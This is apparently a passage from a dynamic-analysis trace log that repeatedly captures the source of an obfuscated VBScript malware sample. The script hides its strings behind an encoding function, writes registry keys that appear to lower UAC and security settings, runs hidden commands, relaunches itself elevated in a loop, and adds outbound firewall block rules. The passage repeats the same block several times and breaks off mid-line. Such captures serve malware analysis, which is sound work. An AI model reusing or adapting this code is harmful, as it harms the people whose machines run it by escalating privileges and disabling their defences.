bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0226.364] wcsncmp (_String1="DDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.364] wcsncmp (_String1="DEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.364] wcsncmp (_String1="EEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.364] wcsncmp (_String1="EOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.364] wcsncmp (_String1="OEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = 